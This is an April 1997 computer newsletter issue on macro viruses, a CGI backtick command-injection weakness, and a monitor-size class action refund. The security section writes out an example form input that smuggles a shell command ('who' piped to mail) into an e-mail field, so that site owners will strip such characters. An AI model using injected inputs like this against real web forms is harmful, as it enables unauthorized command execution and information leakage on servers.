Computer Knowledge Newsletter – April 1997 Issue

In This Issue:

Virus News

There are over 500 macro viruses now. By far, these have quickly become the most widely spread virus problem since viruses were introduced a dozen years ago. There are, however, two ways to virtually guarantee you won’t be infected:

  • Use programs that don’t store macros in the actual data file and/or don’t make macros easy to transmit between computers. Right now, the WordPerfect suite would be the choice (but beware, rumor has it WordPerfect is being changed to store macros in documents; if that happens expect problems with that program as well if they don’t put in anti-virus code).
  • Transmit documents in a format that does not carry macros. I do not open Word documents from anyone else in Word; I read them using the Word Viewer (which does not use macros). If I must edit a Word document from someone else I insist on getting it in Rich Text Format (RTF). This format retains all the formatting but does not store macros. When I transmit documents to others I use RTF as well to show I care. [Update: RTF is capable of directly encoding embedded objects for delivery via that format so if an infected object is embedded into the RTF this format can carry viruses.]

This may seem a bit paranoid, but these simple precautions give great peace of mind and are not at all inconvenient; the translations are transparent.

General Security

If you have a web site or run a server there is a weakness in the CGI scripting that you should be aware of. It involves the backward single quote symbol (`). On many systems UNIX shell commands enclosed in backward single quotes are executed before the command line they are embedded in is executed. The output of the embedded command is then substituted into the original command line and the whole is executed.

Why is this a problem? It’s possible to enter system commands into forms using this technique and hack into systems. One example commonly given would have you enter “who|mail your.mail@address`” into the E-mail address block on a form. When the UNIX server processes the E-mail address response, instead of just noting your address it should run the UNIX who command and then mail the response to you at your E-mail address. In short, you get a list of everyone logged into that UNIX server at that particular time. Of course, other more problematic commands could be used instead.

Before you allow form input to be processed by any of your CGI scripts be certain you strip out any backward quote characters as a precaution.


The internet is an interesting place. Logged into mail one day this past month and there, waiting for me, was a message from an Air Force buddy from thirty years ago; long ago lost. You just never know what’s going to pop up from day to day.

For US readers you should be aware that the lawyers have been at it again; but you might get the proverbial “free lunch” because of it.

For some time computer and monitor makers routinely advertised the diagonal on a monitor as the size of the monitor (the same way TV sets are advertised). Some enterprising soul noted that while TV sets have a picture that goes to the edge of the screen, computer monitors do not; they have a typically smaller viewing area due to a mask. This soul was convinced this amounted to false advertising and got a group of lawyers to file a class action suit against many, many monitor and computer makers. A settlement was reached. Some refunds are in order and you may have noted that all ads now say something like xx-inches viewable size.

The long and short of it is that if you purchased a monitor or computer with monitor between 1 May 1991 and 1 May 1995 you are likely entitled to a refund of a portion of your purchase price. How much? If you have not replaced the monitor you get $6. If you replace the monitor between 7 September 1997 and three years from then you can get $13. It looks like there is a $30 limit for any one person as well.

Details have been published in a number of computer publications and are available by calling (800) 789-0311 or visiting the web site:

http://www.computermonitorcases.comWeb Link

Oh yes, in case you were wondering, the legal firm got $5.8 million plus up to another quarter million dollars for actual expenses. Enjoy your $6.